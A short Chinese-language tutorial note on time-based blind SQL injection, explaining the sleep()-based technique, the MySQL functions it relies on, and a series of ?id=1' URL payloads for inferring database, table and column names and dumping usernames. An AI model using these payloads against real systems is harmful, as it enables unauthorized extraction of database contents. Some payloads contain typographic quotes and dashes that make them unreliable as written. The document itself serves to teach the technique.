知识点

1、SQL盲注概念(转载)

时间盲注又称延迟注入,适用于页面不会返回错误信息,只会回显一种界面,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。

时间盲注 和 Bool 盲注很像,区别就是 “参照物” 的不同,Bool 盲注是通过页面的一些变化来进行判断结果,但是有时候,执行一些 sql 语句的测试,页面不会有像布尔盲注那样直观的变化,这个时候可以在布尔盲注的基础上结合 if 判断和 sleep() 函数来得到一个时间上的延迟参照,也就可以让我们进行一些判断。也就是所谓的 “时间盲注”,又叫“延时注入”。

2、盲注常用函数:

left(m,n) --从左向右截取字符串m返回其前n位
substr(m,1,1) --取字符串m的左边第一位起,1字长的字符串
ascii(m) --返回字符m的ASCII码(常用于猜测库名)
if(str1,str2,str3)--如果str1正确就执行str2,否则执行str3
sleep(m)--使程序暂停m秒,之后执行程序
length(m) --返回字符串m的长度
count(column_name) --返回指定列的值的数目
 

 3、常用pyload

1.库名长度判断

?id=1' and if(length(database())>x,sleep(2),0) --+
意识是如果库名长度长于x的长度就将程序延缓2s执行(后面的--+是sql常见注释符)

2.库名的判断

?id=1' and if(ascii(substr(database(),1,1))=k,sleep(2),0) --+
此为判断第一个字母的ascii码是否为k(可以结合ascii表格用来尝试出库名)
?id=1' and if(ascii(substr(database(),2,1))=k,sleep(2),0) --+
这是查询第二个字母的ascii码值,以此可以推出库名

3.表长的判断

?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=‘。。。。。。’ limit x,y),z,d))=e,sleep(1),0)–+
其中x代表第x+1个表,y表示第x+1往后y个单位的表,z表示第几个字母,d表示z往后d个单位的字母

4.列名的判断

?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=‘user’ and table_schema=database() limit x,y),z,d))=....,sleep(2),1)–+
x:第x+1个列,y:x+1个列往后y个单位,z:x+1列的第一个字母,d:第一个字母往后的第z个单位

5.爆数据

?id=1' and If(ascii(substr((select username from users limit 0,1),1,1))=.....sleep(2),1)--+

总结

对于时间盲注来说,作时应先和其他sql语句一样先判断注入点之后,按套路一点一点的尝试出库名,表名,列名等敏感信息达到sql注入的攻击目的

再补充一点关于sql符号的:闭合符号,结果就是如果构成闭合,则会执行闭合后的代码,且闭合内部的代码并不会被执行